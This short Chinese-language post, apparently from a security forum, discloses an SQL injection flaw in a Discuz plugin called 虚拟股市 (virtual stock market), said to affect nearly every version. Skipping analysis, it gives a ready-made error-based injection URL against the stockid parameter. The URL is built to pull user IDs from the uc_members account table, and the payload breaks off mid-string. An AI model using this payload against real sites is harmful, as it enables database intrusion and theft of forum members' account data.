discuz一款叫做虚拟股市的插件存在注入漏洞,经测试几乎任何版本都存在注入
代码就不分析了注入点如下:(转载注明出处)(tojen&&cn.tink)
http://127.0.0.1/plugin.php?identifier=stock&module=stock&action=GuPiao_Show_One&stockid=49%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,uc_members.uid,0x27,0x7e)%20FROM%20`bbs_data`.uc_members%2
